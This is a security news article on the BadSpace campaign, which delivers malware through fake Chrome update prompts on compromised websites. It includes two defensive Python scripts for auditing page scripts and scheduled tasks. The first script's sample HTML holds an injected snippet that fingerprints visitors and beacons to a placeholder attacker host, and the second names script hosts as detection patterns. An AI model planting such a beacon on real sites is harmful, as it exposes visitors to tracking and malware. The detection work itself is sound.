Stay alert: the "BadSpace" cyber spy is hiding in Chrome updates

Tomcat

The malware campaign is clearly inspired by the recently discovered FakeUpdates malware family.

Computer systems around the world are being attacked using a new malware called BadSpace, which is distributed under the guise of fake Chrome browser updates.

According to the German cybersecurity company G DATA, the attackers use a multi-stage chain, consisting of a compromised website, a command-and-control server, a fake browser update and a JScript downloader, to install the malware on the victim's system.

Researchers kevross33 and Gi7w0rm were the first to report details of this malware last month. The attack starts with a compromised website, including sites built on WordPress, into which code is injected to check whether the user has visited the site before. If it is the first session, the code collects information about the device, IP address, user agent and location and transmits it to a hard-coded domain via an HTTP request.

The server response overlays the page content with a fake Google Chrome update window that either drops the malware directly or delivers a JavaScript loader, which then downloads and executes BadSpace.
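A site owner can look for the first stage described above (an injected script that checks for a prior visit, fingerprints the browser and beacons to a hard-coded external domain) by auditing the scripts a page actually serves. The following is an added defensive example, not code from the original post or from G DATA: it parses a page's HTML with the standard library, flags external script sources and inline beacon URLs whose host is not on a site-specific allowlist, and marks inline scripts that combine a first-visit marker (cookie or web storage) with browser fingerprinting. The sample HTML, the allowlist and the domain names are constructed placeholders.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page: two legitimate scripts plus an injected inline
# script modelled on the behaviour described in the article. All domains
# are placeholders, not real indicators.
SAMPLE_HTML = """<html><head>
<script src="https://example-blog.invalid/wp-includes/js/jquery.js"></script>
<script src="https://cdn.jsdelivr.net/npm/some-lib@1/dist/lib.js"></script>
<script>
if (!document.cookie.includes("visited=1")) {
  document.cookie = "visited=1; path=/";
  var x = new XMLHttpRequest();
  x.open("GET", "https://attacker-c2.invalid/check?ua=" + navigator.userAgent);
  x.send();
}
</script>
</head><body><p>Hello</p></body></html>"""

CLEAN_HTML = """<html><head>
<script src="https://example-blog.invalid/wp-includes/js/jquery.js"></script>
</head><body><p>Hello</p></body></html>"""

# Hosts the site is expected to load scripts from (constructed allowlist).
ALLOWED_DOMAINS = {"example-blog.invalid", "cdn.jsdelivr.net"}

URL_RE = re.compile(r"https?://[^\s\"'<>)]+")
FIRST_VISIT_MARKERS = ("document.cookie", "localStorage", "sessionStorage")
FINGERPRINT_MARKERS = ("navigator.userAgent", "navigator.platform", "screen.")


class ScriptCollector(HTMLParser):
    """Collects external script URLs and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external = []      # values of <script src="...">
        self.inline = []        # bodies of inline <script> blocks
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._in_script = True
                self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def host_of(url):
    return (urlparse(url).hostname or "").lower()


def audit_page(html, allowed):
    """Return a list of (finding, host) tuples for scripts that do not belong."""
    findings = []
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    for src in parser.external:
        host = host_of(src)
        if host and host not in allowed:
            findings.append(("external-script", host))
    for body in parser.inline:
        # Any hard-coded URL in an inline script pointing off-allowlist is a beacon candidate.
        for url in URL_RE.findall(body):
            host = host_of(url)
            if host and host not in allowed:
                findings.append(("inline-beacon", host))
        # First-visit gating combined with fingerprinting is the pattern described above.
        if any(m in body for m in FIRST_VISIT_MARKERS) and any(m in body for m in FINGERPRINT_MARKERS):
            findings.append(("first-visit-fingerprint", ""))
    return findings


if __name__ == "__main__":
    for finding in audit_page(SAMPLE_HTML, ALLOWED_DOMAINS):
        print(finding)
```

Run this against the HTML as served to a first-time visitor (injected code of this kind may behave differently for repeat visits), and keep the allowlist tight: every host not on it is worth a look, whether or not the heuristic for first-visit fingerprinting also fires.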


BadSpace attack scheme

Analysis of the command-and-control servers used in this campaign revealed links to the well-known SocGholish malware, also known as FakeUpdates, a JavaScript loader distributed in a similar way.

BadSpace has sandbox evasion features and maintains persistence on the system through scheduled tasks. It can collect system information, take screenshots, execute commands via the command line, read and write files, and delete scheduled tasks.
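Because the loader is JScript and persistence is achieved through scheduled tasks, a useful hunt on a Windows host is to review every scheduled task whose action starts a script host or runs a script from a user-writable directory. The following is an added defensive example, not code from the original post or from G DATA: it parses scheduled-task XML in the Task Scheduler schema (the format produced by Export-ScheduledTask) and returns the reasons a task looks suspicious. The two task definitions, the user name and the file paths are constructed placeholders; the set of script hosts and directory patterns is an assumption you should tune to your environment.

```python
import re
import xml.etree.ElementTree as ET

# Namespace used by Windows Task Scheduler XML.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Assumed heuristics (tune per environment): binaries that execute scripts,
# directories a non-admin user can write to, and script file extensions.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe",
                "pwsh.exe", "rundll32.exe", "regsvr32.exe"}
USER_WRITABLE = re.compile(r"(\\AppData\\|\\Temp\\|\\ProgramData\\|\\Users\\Public\\|\\Downloads\\)", re.I)
SCRIPT_EXT = re.compile(r"\.(js|jse|vbs|vbe|wsf|hta|ps1)\b", re.I)

# Constructed sample: a task of the kind a JScript loader might register
# (placeholder name and path, not a real indicator).
SUSPICIOUS_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\\Updater</URI></RegistrationInfo>
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>wscript.exe</Command>
      <Arguments>//B C:\\Users\\alice\\AppData\\Roaming\\update.js</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Constructed sample: an ordinary task that should not be flagged.
BENIGN_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\\Microsoft\\Windows\\TimeSync</URI></RegistrationInfo>
  <Actions Context="Author">
    <Exec>
      <Command>%SystemRoot%\\System32\\sc.exe</Command>
      <Arguments>start w32time</Arguments>
    </Exec>
  </Actions>
</Task>"""


def parse_actions(task_xml):
    """Return (command, arguments) pairs for every Exec action in a task."""
    root = ET.fromstring(task_xml)
    actions = []
    for ex in root.findall(".//t:Actions/t:Exec", NS):
        cmd = (ex.findtext("t:Command", default="", namespaces=NS) or "").strip()
        args = (ex.findtext("t:Arguments", default="", namespaces=NS) or "").strip()
        actions.append((cmd, args))
    return actions


def assess_task(task_xml):
    """Return a list of human-readable reasons the task deserves review."""
    reasons = []
    for cmd, args in parse_actions(task_xml):
        # Split on either separator so Windows paths are handled on any host.
        exe = re.split(r"[\\/]", cmd.strip('"'))[-1].lower()
        line = f"{cmd} {args}"
        if exe in SCRIPT_HOSTS:
            reasons.append(f"script host: {exe}")
        if USER_WRITABLE.search(line):
            reasons.append("references a user-writable directory")
        if SCRIPT_EXT.search(line):
            reasons.append("runs a script file")
    return reasons


def is_suspicious(task_xml, threshold=2):
    """A task is flagged when at least `threshold` heuristics fire."""
    return len(assess_task(task_xml)) >= threshold


if __name__ == "__main__":
    for name, xml in (("Updater", SUSPICIOUS_TASK), ("TimeSync", BENIGN_TASK)):
        print(name, is_suspicious(xml), assess_task(xml))
```

On a live host, export each task with PowerShell's Export-ScheduledTask and feed the XML to assess_task; a legitimate browser updater runs its own signed executable from Program Files, not a script host with a file under AppData, which is why two or more hits together are a stronger signal than any single one.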

In addition to G DATA, eSentire and Sucuri have also warned over the past month about various campaigns that use fake browser updates on compromised sites to spread information stealers and remote access trojans.

The BadSpace case clearly demonstrates how sophisticated and multi-staged modern cyber attacks can be. Attackers invest considerable effort in disguising malicious code as legitimate updates and exploit users' trust in well-known brands.

If there is the slightest doubt about the origin of such an "update window", do not interact with it. The browsers installed on the system update themselves without user intervention.

It is also worth applying legitimate updates to the operating system, antivirus software and other installed programs in a timely manner, so as not to leave a digital loophole for attackers to exploit.